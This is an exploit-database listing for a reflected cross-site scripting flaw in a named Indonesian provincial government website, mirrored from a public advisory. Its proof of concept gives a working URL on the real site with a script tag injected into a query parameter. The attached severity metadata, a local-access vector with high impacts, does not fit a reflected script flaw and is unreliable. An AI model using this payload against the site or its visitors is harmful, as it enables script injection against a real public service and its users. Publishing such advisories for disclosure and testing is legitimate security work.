Advertisement






SIM-DPUPESDM Cross Site Scripting (XSS)

CVE Category Price Severity
N/A CWE-79 N/A Medium
Author Risk Exploitation Type Date
Unknown High Remote 2018-04-22
CPE
cpe:cpe:/a:exploitalert:exploitdb:sim-dpupesdm-cross-site-scripting-xss
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018040170

Below is a copy:

SIM-DPUPESDM Cross Site Scripting (XSS)
[+] Title: SIM-DPUPESDM Cross Site Scripting (XSS)
[+] Author: abaykandotcom

Description
------------------------------------------
Integrated Water Resources Management (IWRM) is a process of coordination in the development and management of water resources and land and other resources within a river basin, to obtain balanced economic benefits and social welfare without leaving the ecosystem sustainability.


Proof of Concept
------------------------------------------
The vulnerability can be exploited by using the following url:
http://www.sim-dpupesdm.jogjaprov.go.id/page/datainformasi.php?id=49&nama=[XSS]
http://www.sim-dpupesdm.jogjaprov.go.id/page/datainformasi.php?id=49&nama=<script>onmouseover=alert('XSS by abaykandotcom')</script>

Best regards,
Abay.

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum